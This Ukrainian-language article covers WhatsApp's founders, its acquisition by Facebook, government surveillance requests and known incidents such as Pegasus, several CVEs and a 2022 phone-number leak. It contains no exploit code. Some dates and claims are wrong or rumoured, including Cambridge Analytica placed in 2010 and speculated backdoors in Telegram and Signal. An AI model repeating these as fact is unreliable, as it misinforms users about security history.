Close

Безпека і анонімність в WhatsApp

На авансцені інтернет-месенджерів, здається, знову розгортається боротьба за пальму першості. Telegram вперто намагається не втратити свої позиції в Україні, а на його фоні WhatsApp намагається реанімувати себе – він галопом запускає одну функцію за іншою, вводить канали й навіть планує підключати штучний інтелект. Такий розгін викликає інтерес. А разом з тим зростає й кількість спроб зламати WhatsApp, використати в шпигунстві, шахрайстві та інших маніпуляціях. Я хочу, щоб користувачі знали які ризики та небезпеки чекають на них у найпопулярнішому в світі месенджері. Я розкрию секрети, про які ви ще не знали. Я розкажу про всі вразливості та продемонструю їх на практиці, а також обов’язково дам поради щодо захисту облікового запису WhatsApp.

Історія і хронологія WhatsApp

ℹ️ Традиційно розпочинаємо наш матеріал з екскурсу в історію. Важливо зрозуміти точку відліку, філософію та концепцію WhatsApp. Хто його засновники, що це за люди? Щоб отримати цілісну картинку, необхідно сформувати глибинне уявлення про цей додаток.

WhatsApp розпочав свою діяльність як платформа для обміну миттєвими повідомленнями для смартфонів в далекому 2009 році. Його заснували колишні працівники компанії “Yahoo” – Ян Кум (Jan Koum) та Браян Ектон (Brian Acton).

Спробуємо коротко проаналізувати їх життєпис, а за одно визначити історичні періоди WhatsApp.

Ян Кум

Ян Кум Ян Борисович Кум — народився 24 лютого 1976 року під Києвом, дитинство минало у Фастові. У 1992 році разом з бабцею та матір’ю емігрує у США, в Каліфорнію. Його батько залишився в Україні, працював будівельником і прожив там до самої смерті у 1997 році.

У США родина Кумів спочатку жила на соціальні виплати, їм видали двокімнатну квартиру і надавали талони на харчування. Мати працювала нянею, а 16-річному Яну навіть довелося деякий час попрацювати прибиральником у місцевому супермаркеті.

У 18 років хлопець вже серйозно захоплювався комп’ютерною літературою і програмуванням. Любив пограти у футбол та хокей. Займався боксом. Незабаром вступає до Державного університету Сан-Хосе, паралельно підпрацьовуючи в компанії “Ernst&Young” пентестером й дослідником з кібербезпеки.

Невдовзі Ян Кум заприятелював з Браяном Ектоном, який працював в компанії “Yahoo”. У 1998 році Яна теж запрошують в “Yahoo” й він отримує роботу мрії на посаді IT-інженера. Вони з Ектоном успішно працюють, товаришують, подорожують Америкою, обмінюються професійним досвідом. Робота приносила йому хороший дохід – за деякий час вдалось назбирати близько півмільйона доларів.

У 1999 році Ян відвідує хакерську конференцію “DefCon”, де завів перші професійні знайомства. Він був учасником хакерського клубу “w00w00”. Подейкують саме вони врятували Кума, коли “Yahoo” вибила з мережі потужна DDoS-атака.

Ян Кум з хакерами на конференції "DefCon" 1999 року
Сет МакГенн (LR), Ендрю Рейтер, Даг Сонг і Ян Кум на хакерській конференції “DefCon” в Лас-Вегасі, штат Невада, 1999 рік.

З часом виникає ідея створення власного додатка для обміну миттєвими повідомленнями в Інтернеті для смартфонів, що дозволило б спілкуватися з близькими без значних витрат. Стільниковий зв’язок коштував тоді дорого і це мало стати альтернативою SMS/MMS та GSM.

Незабаром Ян придбав собі перший iPhone і був вражений потенціалом магазином додатків Apple Store. Вони разом з Браяном Ектоном збиралися в Алекса Фішмана (CEO of Bugsee) на кухні та довгими вечорами невтомно обговорювали майбутній додаток.

На думку останнього, непогано було б придумати систему статусів з короткими текстовими повідомленнями, які б з’являлися під аватарками користувачів. Пізніше саме ця ідея і принесе популярність месенджера.

Розробити додаток хлопцям допоміг програміст на iOS – Ігор Соломенніков, якого вони знайшли на порталі RentACoder.com (сьогодні він працює в Signal Messenger).

У 2000 році помирає мати Яна. 24 лютого 2009 року, у свій 33-й день народження, бувши круглим сиротою, Ян Кум оголосив про створення компанії WhatsApp Inc. в Каліфорнії.

Назва звучала як “what’s up” – “як справи” або “що нового”.

Браян Ектон

Браян Ектон Браян Ектон — народився 17 лютого 1972 року в Мічигані. Його мати керувала власним транспортно-експедиторським бізнесом. Пізніше Браян переїхав до Флориди, де закінчив середню школу. Початково вступив на комп’ютерну інженерію в Університет Пенсільванії, був стипендіатом, але через рік перейшов у Стенфорд за спеціальністю “Інформатика”. У 1992 році працював системним адміністратором в “Rockwell International”, потім тестувальником в “Apple”. У 1994 закінчив Стенфордський університет й здобув ступінь бакалавра.

У 1996 році Браян приєднався до компанії “Yahoo” як інженер ІТ-інфраструктури й став їх 44 співробітником. Через деякий час він знайомиться з молодим тестувальником безпеки Яном Кумом, який на той час працював в компанії “Ernst&Young” й провів пентест на замовлення Yahoo. Вже через кілька років вони обоє працюватимуть в “Yahoo” й стануть приятелями.

У 2000-му Ектон встиг “прогоріти” на “бульбашці доткомів”, вклавши в них солідну суму.

У 2007 році разом з Кумом вони покидають “Yahoo”, після чого подають заявку на роботу в “Facebook”, але їх не беруть.

Вони навіть й подумати не могли, що саме завдяки цьому у 2009 році постане їх дітище – WhatsApp.

Становлення WhatsApp

Перший реліз месенджера WhatsApp відбувся для пристроїв iPhone. Додаток завантажило не більше сотні людей. Переважно всі ті, які збиралися на піцу у Фішмана. WhatsApp мав чимало багів. Ян Кум в якийсь момент навіть розчарувався і вже подумував шукати роботу, але досвідчений Браян заспокоїв: “Не падай духом, постривай… Треба трохи зачекати.. Все буде. Побачиш.”.

Ян Кум і Браян Ектон
Ян Кум (справа, стоїть) і Браян Ектон (зліва від нього, сидить)

В червні Apple ввела в iOS нову функцію – push-повідомлення. Тут і вистрілила  “фішка” Фішмана зі статусами. Коли користувачі змінювали їх — додаток розсилав усім контактам push-повідомлення. Таким чином люди почали обмінюватись статусами: “Ти де?”, “Я в машині”, “Буду за 10 хв” і т.д. Хлопці зрозуміли, що створили мобільний месенджер. WhatsApp був врятований.

Ян з Браяном збиралися в місцевому хабі “Red Rock Cafe” в Маунтін-В’ю, Каліфорнії. Там вони активно доробляли WhatsApp. Другий реліз вийшов в серпні 2009-го, вже з підтримкою функції обміну повідомленнями. Загальна кількість користувачів зросла до 250 000.

Історія версій WhatsApp

Нічого подібного на той час не існувало, тому популярність месенджера збільшувалась в геометричній прогресії. Браян навіть залучив своїх колег з “Yahoo” й ті вклали $250 000 у початкове фінансування проєкту, отримавши за це свої частки.

Невдовзі почалися пошуки додаткових розробників, які б допомогли зробити WhatsApp кросплатформним і адаптувати під BlackBerry, Symbian та Android пристрої.

WhatsApp old version

З допомогою тих же знайомих з “Yahoo”, хлопцям вдалось взяти в оренду приміщення під офіс. Більшу частину будівлі займала компанія “Evernote”, яка скептично поставилася до ентузіастів, які приїжали на роботу на велосипедах та працювали за дешевими столами Ikea, зігріваючись кавою та ковдрами.

Перший час Яну і Браяну доводилося працювати безкоштовно — за свій рахунок вони оплачували послуги брокерів для розсилки SMS-повідомлень активації додатка. Реєстрація у WhatsApp проходила по номеру телефона, що на той час було актуальним, адже, по-перше, було прямою альтернативою мобільному зв’язку, а по-друге, дозволяло легко знаходити друзів і комунікувати з ними.

До початку 2010 року вони вийшли на прибуток в 5000 доларів на місяць, що було достатньо, аби покрити деякі витрати. Станом на 2011 рік в WhatsApp працювало близько 20 співробітників і він входив у 20-тку кращих додатків Apple Store.

У 2013 році штат WhatsApp вже налічував 50 співробітників, а його користувацька аудиторія – 200 мільйонів. Потихеньку ним цікавилися великі гравці на ринку інформаційних технологій. Першим спроби покупки WhatsApp зробив Google, але вони були відхилені. У висновку, венчурний фонд “Sequoia Capital” зробив інвестицію на 50 мільйонів доларів, оцінивши WhatsApp у $1,5 мільярда. Це був успіх.

Браян Ектон, Ян Кум і Джим Ґетц із Sequouia після підписання угоди.
Браян Ектон, Ян Кум і Джим Ґетц із Sequouia після підписання угоди.

На зароблені кошти WhatsApp придбав стартап “SkyMobius” із Санта-Клари (США), які були розробниками месенджера Vtok. Vtok був популярним месенджером для мобільних пристроїв, що дозволяв користувачам здійснювати відеодзвінки та спілкуватися з допомогою текстових повідомлень. Він здобув популярність завдяки своїй сумісності з Google Talk (тепер Google Hangouts) і синхронізації контактів Google.

До команди WhatsApp також входили такі IT-спеціалісти як: Рік Рід (Software Engineer) і Євген Фуксман (Infrastructure Software Developer).

Справи йшли на краще. Аудиторія додатка вже налічувала понад 400 мільйони активних користувачів по всьому світі. WhatsApp став одним з найпопулярніших месенджерів світу.

Інвестори час від часу намагались використати свої важелі впливу, нав’язуючи рекламний бізнес, але Ян з Браяном тримали марку, позиціонуючи WhatsApp як серйозний додаток з ухилом на конфіденційність. Їхнім гаслом стало: “No Ads! No Games! No Gimmicks!” (“Жодної реклами, жодних ігор, жодних хитрощів!”).

У своєму блозі вони писали: “Ніхто не прокидається із захопленням, побачивши більше реклами. Ніхто не лягає спати, думаючи про рекламу, яку він побачить завтра… Коли йдеться про рекламу, ви, користувач, є продуктом“.

В одному з твітів Ян Кум процитував співака Каньє Веста, написавши: “Ти думаєш, що ти вільний, але ти раб грошей, крихітко”.

Щоб закрити питання реклами раз і назавжди, розробники спеціально ввели плату за WhatsApp – встановивши символічні 0,99 цента.

Епоха Цукерберга

Однак, чудо не могло тривати вічно. Хлопці розуміли, що WhatsApp десь набирає свого піка, а далі піде спад. Щоб втриматись — треба ще більше коштів, досвіду і фарту.

2013 рік приніс їм $148 млн витрат, з яких $138 млн — збитки. Тож від пропозиції Facebook вони просто не змогли встояти. Це були шалені кошти, які кожному з них фактично забезпечили довічне гідне існування. Окрім того, Марк Цукерберг їх запевнив, що WhatsApp залишиться автономним і незалежним та не буде ділитися даними з Facebook.

19 лютого 2014 року компанія Facebook придбала WhatsApp за рекордні 19 мільярдів доларів. Браян володіє понад 20% акцій компанії. Ян Кум – 45%. Решта часток мають різноманітні інвестори та співзасновники.

З приходом Марка Цукерберга, “повістка дня” у WhatsApp дещо змінилася. Перше, що він зробив — це скасував плату і зробив месенджер “безкоштовним”. Додаток став частиною платформи Facebook й почав повільно, зате впевнено рухатися у бік реклами і маркетингу.

Цукерберг орієнтувався на масового споживача. Його головним критерієм була кількість. Якщо Кум з Ектоном були новаторами, уникали надмірного пафосу та піару й зберігали золоту середину “Безпека + комфорт”, то Цукерберг впевнено йшов до своєї мети — набрати перший мільярд.

Певний час колишні власники WhatsApp допомагали Марку, продовжуючи співпрацювати та покращувати додаток. У 2014 році Ян Кум увійшов до Ради правління Facebook. А у 2016 році, завдяки молодому криптографісту Моксі Марлінспайку (екс-інженер Twitter, засновник Open Whisper Systems / Signal), з яким вони познайомилися ще у 2013-му, було реалізовано довгоочікуване наскрізне End-to-End (E2EE) шифрування.

Це стало важливим етапом не тільки в історії розвитку WhatsApp, а й взагалі інтернет-комунікацій як таких. WhatsApp на той час по суті став першим захищеним месенджером, який за словами засновників, захищав користувачів від стеження, прослуховування і перехоплення. Месенджер навіть отримав схвальну оцінку товариства з питань безпеки та приватності “Electronic Frontier Foundation”6 балів із 7.

Пізніше, в інтерв’ю WIRED Кум та Ектон зізналися, що на них чинили тиск з метою залишити бекдор у шифруванні, який у середовищі спеціалістів з кібербезпеки ще називають “протоколом привида” (ghost protocol). Він передбачає таємне дублювання зашифрованого каналу. Кажуть, в Telegram такий бекдор є.

Імовірно, є він і в додатку Signal. Ось як заявляли представники шпигунського програмного забезпечення Cellbebrite на своєму сайті у 2020 році з приводу цього месенджера:

Протестувальники використовують додаток (ред. – Signal), щоб безпечно спілкуватися зі своїми командами, які збирають протестувальників, обговорюють тактику та підтримують зв’язок із поліцією. Злочинці також використовують цю програму для спілкування, надсилання вкладень і укладення незаконних угод, які вони хочуть тримати в таємниці та поза полем зору правоохоронних органів. Оскільки він шифрує практично всі свої метадані, щоб захистити своїх користувачів, правові органи намагаються вимагати від розробників зашифрованого програмного забезпечення вмикати «бекдор», який дає їм доступ до даних людей. 

До досягнення таких домовленостей Cellebrite продовжує наполегливо працювати з правоохоронними органами, щоб дозволити агентствам розшифровувати та декодувати дані з програми Signal за допомогою Cellebrite Physical Analyzer і після вилучення, виконаного Cellebrite Advanced Services.

Cellebrite backdoor in Signal Messenger

Ось як розповідає про бекдори і лазівки в алгоритмах шифрування американський журналіст Шейн Гарріс у своїй книзі “Війн@: Битви в кіберпросторі” (2019):

“Упродовж десяти останніх років АНБ спільно з британськими
колегами з Центру урядового зв’язку поклало чимало зусиль на боротьбу з криптографічними технологіями, інсталюючи приховані
вразливості в поширені стандарти шифрування. Шифрування – це
процедура перетворення даних (наприклад, електронного листа) в
мішанину цифр і символів, яку можна розшифрувати лише за допомогою ключа, яким володіє адресат. Якось АНБ вступило у відкриту боротьбу за отримання доступу до ключів шифрування, щоб розшифровувати повідомлення за власним вибором, але програло битву. Тоді агентство взялося за послаблення алгоритмів шифрування, які використовуються насамперед для кодування онлайн-комунікацій. АНБ – це домівка найкращих у світі криптографів, яких регулярно консультують різноманітні інституції, зокрема й державні агентства, щодо збільшення стійкості алгоритмів шифрування.”

В травні 2024 року видання The Interpecpt заявило, що у березні команда безпеки WhatsApp випустила внутрішнє попередження для своїх колег: попри потужне шифрування програмного забезпечення, користувачі залишаються вразливими до небезпечної форми урядового стеження. Інженери WhatsApp буцімто писали, що державні установи «обходили шифрування», щоб з’ясувати, які користувачі спілкуються один з одним, членство в приватних групах і, можливо, навіть їх місцеперебування. Вразливість заснована на «аналізі трафіку» — техніці мережевого моніторингу, яка існує десятиліттями і базується на аналізі інтернет-трафіку у великому національному масштабі. Про неї писав New York Times в контексті можливості російських спецслужб аналізувати трафік популярних месенджерів.

WhatsApp Encryption Model

У вересні 2017 року Браян Ектон покинув WhatsApp, голосно стукнувши дверима. У інтерв’ю Forbes він розповів про те, що його мета була “зробити приватне спілкування приватним і всюдисущим”, а натомість Facebook намагався монетизувати WhatsApp усіма можливими способами, обходячи регуляторів ЄС.

У квітні 2018 року про те, що покидає WhatsApp і йде з Ради директорів Facebook через внутрішні розбіжності заявив Ян Кум. Відтепер Цукербергу вже ніхто не “заважав” монетизувати WhatsApp, який сягнув пікової точки в 1,5 мільярда користувачів та став найпопулярнішим додатком всіх часів і народів на всіх континентах світу.

Most popular mobile messenger apps

Падіння WhatsApp

Без Кума та Ектона, WhatsApp швидко прийняв “відтінок” Facebook й поступово почав деградувати. Месенджер під’єднали до глобальної мережі ADINT – рекламно-аналітичної машини, “силу” якої відразу відчули на собі користувачі. З’явилося безліч пліток та історій про те як WhatsApp таємно підслуховує своїх користувачів й підсовує їм релевантну рекламу. Європейський Суд по правах людини у відповідь почав розслідування і оштрафував компанію за порушення конфіденційності.

How Whatsapp collect metadata

У 2018 році Meta запустили комерційну версію для бізнесу – WhatsApp Business. У 2020 в Індії з’явилася платіжна система WhatsApp Payments, яка дозволила проводити фінансові операції через месенджер. Також була укладена угода з найбільшими банками Бразилії, яка займає перше місце за кількістю користувачів WhatsApp.

Популярність WhatsApp у різних країнах

У січні 2021-го Цукерберг оновив Політику конфіденційності WhatsApp, у якій відкрито заявлялось про обмін даними з материнською компанією Meta. Ті, хто не прийняли її до 8 лютого 2021 року, повинні були втратити доступ до месенджера. Це викликало значний резонанс і хвилю обурення серед користувачів. Багато користувачів почали масово переходити на інші платформи обміну повідомленнями, такі як Signal і Telegram.

29 листопада 2021 року видання Rolling Stone оприлюднило секретний документ, який показував перелік метаданих, які популярні месенджери надають правоохоронним органам на їх запит. Виявилося, що найбільше інформації “зливає” WhatsApp:

У 2022 році в журнал Forbes просочилися шокуючі факти, що WhatsApp допомогав федералам США вести цифрове стеження за 7 користувачами з Китаю та Макао. WhatsApp дали вказівку контролювати їх IP-адреси та номери телефонів, а також контакти й статистику використання. Негласне стеження здійснювалося відповідно до Закону США 1986 року “Про конфіденційність електронних комунікацій” (Electronic Communications Privacy Act of 1986 (ECPA)). Є припущення, що ці люди  торгували небезпечними опіум-наркотиками (опіоїдами).

Скріншот урядового наказу щодо цифрового стеження за користувачами WhatsApp.

Журналісти Forbes проаналізували також інші судові документи та знайшли кілька цікавих випадків. Так, у 2016 році суд штату Огайо запросив у WhatsApp відстежити номери телефонів й повідомлень підозрюваного в рамках розслідування зловживання наркотиками. Надавались такі дані як: дата, час і тривалість викликів, адресна книга. Також вимагалась інформація про будь-які SMS-повідомлення, до яких WhatsApp мав доступ. Це стеження мало тривати 60 днів, не розголошуючи підозрюваному про це. Також наголошувалось, якщо месенджер ще не має «опції ідентифікації абонента або подібної функції», він мав створити її, аби правоохоронні органи могли ефективніше відслідковувати свої цілі. З іншими наказами можна ознайомитись тут.

Ордер на цифрове стеження WhatsApp

Раніше у 2013 році екс-співробітник АНБ і системний інженер Едвард Сноуден опублікував в британській газеті “The Guardian” конфіденційні спецматеріали про те, що популярні соцмережі і месенджери (зокрема Facebook і WhatsApp) тривалий час таємно використовувалися в роботі програм електронної розвідки і шпіонажу, таких як: XKeyscore, PRISM, ECHELON та інших.

7 березня 2017 року видання хактивістів WikiLeaks опублікувало серію витоків Центрального розвідувального агенства США (ЦРУ, CIA) під назвою “Vault7”. В ньому зокрема йшлося про хакерський арсенал ЦРУ, який дозволяє обійти шифрування популярних додатків для миттєвого обміну повідомленнями – WhatsApp, Signal, Telegram, Wiebo, Confide і Cloackman шляхом зламу мобільних пристроїв.

WikiLeaks "Vault7"

За офіційною статистикою, щорічно компанія Meta задовільняє сотні державних запитів з різних країн щодо персональних даних користувачів її платформ, включаючи вихідні та вхідні повідомлення. І кількість їх стабільно росте рік за роком:

Видання ProPublica опублікувало матеріал у якому йдеться про численних модераторів (понад 1000), яких наймає й утримує Meta для перевірки контенту в WhatsApp. Модератори переважно віком від 20 до 30 років, розмовляють різними мовами, багато хто з минулим досвідом роботи продавцями в магазинах, контролерами бакалійних магазинів і бариста, найняті підрядниками. Оплата праці починається близько 16,50 доларів на годину.

Щотижня вони перевіряють мільйони вмісту WhatsApp. Оскільки контент зашифрований, системи штучного інтелекту не можуть автоматично сканувати всі чати, зображення та відео, як це роблять у Facebook та Instagram. Щойно користувачі натискають в месенджері кнопку «Повідомити», визначаючи повідомлення як таке, що ймовірно порушує умови обслуговування платформи, воно потрапляє до модераторів.

Разом з повідомленнями, вони отримують безліч метаданих: імена та зображення профілів користувачів, їх номер телефону, статус, рівень заряду акумулятора, мова та часовий пояс, IMEI, MAC та IP-адреса, рівень сигналу Wi-Fi, операційна система, пов’язані облікові записи Facebook та Instagram, час останнього візиту та будь-яка попередня історія.

Модератори перевіряють широкий спектр категорій, зокрема «Повідомлення про спам», «Громадський поганий діяч» (політична мова ненависті та дезінформація), «Глобальна достовірна загроза тероризму», «CEI» (зображення, що використовують дітей) і «CP» (дитяча порнографія). Модератори можуть поставити обліковий запис користувача на “моніторинг”, тимчасово або навічно забанити його, а в особливих випадках – передати правоохоронним органам.

За що можуть забанити в WhatsApp

Усі ці та інші факти врешті-решт змінили імідж та репутацію, а разом з тим й портрет цільового користувача WhatsApp. Додаток почав помітно просідати й відставати від конкурентів. Гасло “Конфіденційність у нашому ДНК” більше не сприймалось як щось серйозне. Відомі компанії та люди відверто почали закликати користувачів до переходу на інші платформи.

Наприклад, Ілон Маск опублікував твіт “Користуйтесь Signal.”  Те саме зробив Сноуден. Після зламу Facebook, коли було злито дані понад 500 млн користувачів, виявилося, що номер Цукерберга був прив’язаний до Signal, а не WhatsApp. Джуліан Ассанж на початку повномасштабної війни порадив українцям застосовувати P2P-месенджер Briar.

У висновку, цим скористався Telegram – прямий конкурент WhatsApp. Йому розкрилися величезні перспективи та можливості. Як заявив Павло Дуров, близько 8 мільйонів користувачів перейшло з WhatsApp у Telegram від моменту його продажу.

Браян Ектон у подальшому разом з Моксі Марлінспайком заснували Signal Foundation та месенджер Signal, який сьогодні є найуспішнішим захищеним аналогом WhatsApp. Як пишуть ЗМІ, Браян одружений на українці.

Щодо Яна Кума, то він почав колекціонувати рідкісні Porsche з повітряним охолодженням та захоплюватись грою в алтимат-фрісбі. Має власну яхту. Зустрічається з Евеліною Мамбетовою, яка родом з кримських татар. Пожертвував 1 мільйон доларів на проєкт FreeBSD, що є найбільшим донатом в історії. Після початку повномасштабної війни рф проти України, зробив чимало донатів громадам і організаціям іудеїв, які надають гуманітарну допомогу біженцям війни.

Сьогодні WhatsApp знову пробує реабілітуватись, вводить одну функцію за іншою, намагається заохочувати користувачів.

Пропонуємо освіжити пам’ять й згадати які інциденти та вразливості були пов’язані з WhatsApp за останні роки.

Інциденти, витоки, вразливості WhatsApp

WhatsApp Vulnerabilities

🔴 Інцидент з Cambridge Analytica (2010)

У 2010 році персональні дані мільйонів користувачів Facebook таємно збиралися британською консалтинговою компанією “Cambridge Analytica”, які були використані для різних цілей, у тому числі політичних. Дані були зібрані з допомогою додатка “This Is Your Digital Life”, розробленого американським вченим Александром Коганом.  Додаток пропонував користувачам Facebook пройти невеличкий тест для побудови “портрету особистості” та називав себе “дослідницькою програмою, яку використовують психологи”. Як виявилося, він отримував доступ не лише до сторінки користувача, а й усіх друзів, масово збираючи дані з блоку Facebook Open Graph, де вказувались ідентифікаційні дані. Інформацію про зловживання оприлюднив у 2018 році Крістофер Вайлі – колишній співробітник Cambridge Analytica.

Така халатність стала результатом бізнес-моделі Цукерберга. Як сказав Сенді Паракілас, колишній операційний менеджер Facebook: «Модель полягала в створенні, зростанні та монетизації. Захист користувачів не вписувався в це». Він також додав, що Facebook не проводив жодного аудиту розробників за час їх роботи.

Результатом скандалу стали численні судові розгляди, штрафи та падіння акцій Facebook, які досягнули свого найнижчого рівня в історії. Скандал дійшов до того, що засновнику Facebook Марку Цукербергу довелося давати офіційні свідчення перед кількома комітетами Конгресу Сполучених Штатів. Чимало авторитетних компаній відвернулися від Facebook. У мережі ширився хештег #DeleteFacebook, який навіть поширив Браян Ектон. Компанія Cambridge Analytica збанкрутувала. На Netflix випустили документальний фільм про ці події під назвою “The Great Hack”.

WhatsApp месенджер теж постав перед ударом, адже він “зливав” дані Facebook. Щоб вирішити цю проблему, Політику конфіденційності оновили, чітко вказавши, що інформація більше не передаватиметься Facebook для маркетингу, при цьому все одно дозволяючи Facebook використовувати дані для “внутрішніх цілей” для покращення своїх продуктів.

🔴 Злам WhatsApp шпигунським ПЗ Pegasus Spyware (2019)

У 2019 році стало відомо, що зловмисне шпигунське програмне забезпечення під назвою “Pegasus”, скориставшись вразливістю нульового дня (CVE-2019-3568) в додатку WhatsApp, проникло на пристрої мільйонів користувачів та могло переглядати, копіювати, модифікувати, перехоплювати і прослуховувати будь-які повідомлення, які користувачі відправляли по месенджеру, і не тільки.

Pegasus розроблявся у військово-політичних цілях ізраїльською компанією NSO Group (відомі також як “Q cyber technology”). Подейкують, серед учасників є ветерани підрозділу кіберрозвідки Ізраїлю – “8200”. Шпигунський софт названий на честь Пегаса – крилатого коня у давньогрецькій міфології. Вперше його помітили у 2016 році. За даними New York Times, Pegasus закуповували уряди різних країн з метою розслідувань національної безпеки – стежити за політиками, журналістами, юристами, дисидентами, активістами, спецслужбістами, гангстерами, терористами тощо. Як повідомляє міжнародний проєкт “Forbidden Stories” – щонайменше 180 журналістів по всьому світу стали жертвами Pegasus.

Pegasus Spyware

Pegasus являє собою експлойт або набір експлойтів, який розгортається на мобільному пристрої жертви через інтернет-з’єднання з вразливим додатком, наприклад це може бути вхідний дзвінок або посилання у WhatsApp. Причому, жодних дій від жертви не вимагається – так-звана zero-click/zero-touch атака. Єдина вимога – наявність вразливого смартфона або додатка. Усе відбувається дистанційно через віддалене виконання коду (Remote Code Execution). Платформа і операційна система – значення не мають.

WhatsApp expoited

Після вдалого проникнення, Pegasus отримує root-права і повністю бере під контроль пристрій. Керується віддалено через центральний сервер. Після закінчення операції – самознищується, не залишаючи по собі жодних слідів чи доказів. Фактично, це кіберзброя нового покоління.

У 2017 році Facebook подав до суду на NSO Group. Лише у травні 2019 року WhatsApp офіційно заявив, що пропатчив цю діру безпеки й закликав користувачів оновитись до останньої версії. За деякими даними, постраждало більше 1400 користувачів. Серед них були громадські діячі. Ходять чутки, Цукерберг намагався купити Pegasus в NSO Group, за що і поплатився.

Однак на цьому, історія з Pegasus не закінчилася. У 2018 році було зламано мобільний пристрій американського мільярдера, власника Amazon і Washington Post Джеффа Безоса. Йому надіслали у WhatsApp відеофайл, який виявився шкідливим. У результаті запустився експлойт, який за годину викачав з телефону усі дані.

Послужив “троянським конем” WhatsApp й у справі зламу мобільного пристрою екс-прем’єр-міністерки Ліз Трасс. Чимало фахівців безпеки розкритикували сам факт використання WhatsApp урядовцями. Один із експертів, професор Ентоні Гліз заявив: “Ми маємо міністрів, які використовують свої приватні телефони для ведення урядових справ через WhatsApp і свою особисту електронну пошту, і це має бути негайно припинено. Це абсолютно безвідповідально.”.

nso pegasus admin panel
Панель керування шпигунського програмного забезпечення NSO Pegasus

До слова, у багатьох країнах ЄС, наприклад Швейцарії та Франції на офіційному рівні заборонено використання WhatsApp посадовими особами, зокрема військовими та політиками. У Великобританії на даний момент до цього справа ще не дійшла, але після інциденту з Трасс була видана брошура з рекомендаціями для чиновників щодо використання WhatsApp-месенджера.

У червні 2020-го британське видання The Guardian опублікувало розслідування, у ході якого стало відомо, що спікер регіонального парламенту Каталонії Роджер Торрент та принаймні ще двоє його прихильників стали жертвами шпигунського програмного забезпечення NSO, яке експлуатувало дірки безпеки WhatsApp.

У 2023 році просочилася новина, що Національна гвардія Техасу незаконно стежила через WhatsApp за мігрантами з Латинської Америки. Офіцери таємно проникли у групові чати з метою проведення шпигунської операції “Самотня зірка”.

Підсумовуючи, можна сказати, що факт існування Pegasus є тривожним дзвіночком не лише для користувачів WhatsApp, а й для усього людства загалом, адже підриває основи безпечного та вільного інтернету і провокує невидимі зловживання, котрі порушують конституційні права та свободи людини.

До речі, Pegasus не виняток. На сьогодні існує ціле сімейство зловмисного софту – Chrysaor, Candiru, Cellebrite, Phantom, Predator.

🔴 Витік даних 487 мійльйонів користувачів WhatsApp (2022)

16 листопада 2022 року на одному з хакерських форумів з’явилося оголошення про продаж бази даних з 487 мільйонами мобільних номерів активних користувачів WhatsApp з різних країн світу.

За припущеннями експертів, ці дані зловмисникам вдалося зібрати з допомогою скрапінгу або парсингу чатів WhatsApp. Meta ніяк не прокоментувала цю подію, хоча це вже другий великий витік, починаючи з 2021 року, коли було злито дані більше 500 мільйонів користувачів Facebook.

WhatsApp leak 487 million phone numbers

Витік телефонних номерів небезпечний тим, що він може бути використаний зловмисниками для різноманітних шахрайських операцій – інформаційно-психологічних атак, спаму, фішингу, вішингу, смішингу, видавання себе за іншу особу і так далі. Так, в грудні 2023-го в українських ЗМІ з’явилася новина про те, що тисячі українців стали жертвами махінацій у WhatsApp – їм писали люди з різних закордонних номерів, пропонуючи нібито роботу. У висновку, з них видурювали значні суми.

Скаммери в WhatsApp

Баги і вразливості WhatsApp Messenger (CVE/CWE)

У 2018-2019 роках дослідники безпеки з “Check Point Research” опублікували ряд вразливостей, присутніх у месенджері WhatsApp:

  • Вразливість, яка дає можливість розшифровувати та підробляти текст повідомлень у чаті, маніпулюючи технічними параметрами. Вразливість призводить до системного збою WhatsApp – додаток виходить з ладу на смартфоні і продовжує аварійно завершуватись, поки його не перевстановити. При цьому вміст чату буде назавжди втрачено. Вплив вразливості був величезним, адже це торкалося усіх груп. Помилка виявлена в серпні 2019 року та повідомлена в WhatsApp. Виправлено в оновленій версії 2.19.58 і новіших.
  • Вразливість, яка дає можливість дрозшифровувати повідомлення, видавати себе за іншого користувача та змінювати текст відповіді, маніпулюючи функцією “цитата” в груповому чаті. Хакери використали проксі BurpSuite та самописний додаток до нього, проексплуатувавши протокол potobuf2 (метод структурованих даних). Звіт про знайдені вразливості був представлений на конференції Black Hat 2019.

У грудні 2019 року WhatsApp підтвердив вразливість CVE-2019-11932, яка дозволяла використовувати шкідливий файл зображення GIF для отримання доступу до даних користувача. Коли одержувач відкривав галерею в WhatsApp аввтоматично виконувався віддалений код (Remote Code Execution) і відбувався злам. Вразливість була знайдена дослідником із Сінгапура у функції DDGifSlurp для Android у версіях Whatsapp до 2.19.244. Недолік було виправлено в наступних оновленнях.

У грудні 2021 року британська компанія з кібербезпеки NCC Group Security Services провела оцінку захищеності WhatsApp, зокрема бібліотеки з відкритим кодом opaque-ke, яка застосовується для реалізації протоколу обміну ключами шифрування. В рамках аудиту було виявлено критичні вразлиовсті, зокрема такі проблеми безпеки як: недостатня перевірка вхідних даних, ризик розкриття пароля клієнта сервером через експорт ключа, відсутня перевірка довжини, помилки реалізації I2OSP, застарілі залежності та інше. Усі вразливості були виправлені.

На початку 2022 року стало відомо, що стартап з кібербезпеки “Boldend” із Сан-Дієго, США розробив інструменти для зламу шифрування WhatsApp, отримуючи доступ до даних користувачів з 2017 року. Найцікавіше, що стартап фінансувався інвестором Facebook Пітером Тілем. Вразливість була виправлена в січні 2021 року.

25 вересня 2022 року було повідомлено про дві критичні вразливості у функції відеодзвінків WhatsApp на Android (CVE-2022-36934, CVE-2022-27492). Помилка цілочисельного переповнення дозволяла зловмисникам отримати повний контроль над програмою жертви після встановлення відеодзвінка між двома користувачами WhatsApp. Нападники через корисне навантаження проексплуатували компонент Video Call Handler, що призвело до переповнення буфера і дозволило переписати пам’ять програми.

У 2023 році NCC Group знову провели аудит кібербезпеки на замовлення Meta – була досліджена бібліотека Rust з відкритим кодом Auditable Key Directory (AKD). Вона дозволяє користувачам відстежувати зміни в загальнодоступних ключах, пов’язаних з обліковими записами (функція “60-значний код безпеки”). Було виявлено 1 вразливість середнього ступеня тяжкості, 8 низького та 6 інформаційних зауважень. Зокрема, проблеми з оновленням ключів шифрування, загальнодоступність деяких функцій API, хешування VRF повертає неправильний результат, що призводить до збоїв. Усі проблеми були виправлені.

Джерела:

Архітектура та інфраструктура WhatsApp

Архітектура WhatsApp

WhatsApp – це безкоштовна централізована платформа пропрієтарного типу для інтернет-комунікації з підтримкою наскрізного End-to-End шифрування. Належить американському технологічному конгломерату Meta Platforms. Дозволяє користувачам надсилати текстові, голосові та відеоповідомлення, здійснювати голосові та відеодзвінки, а також ділитися зображеннями, документами, місцезнаходженням та іншим вмістом.

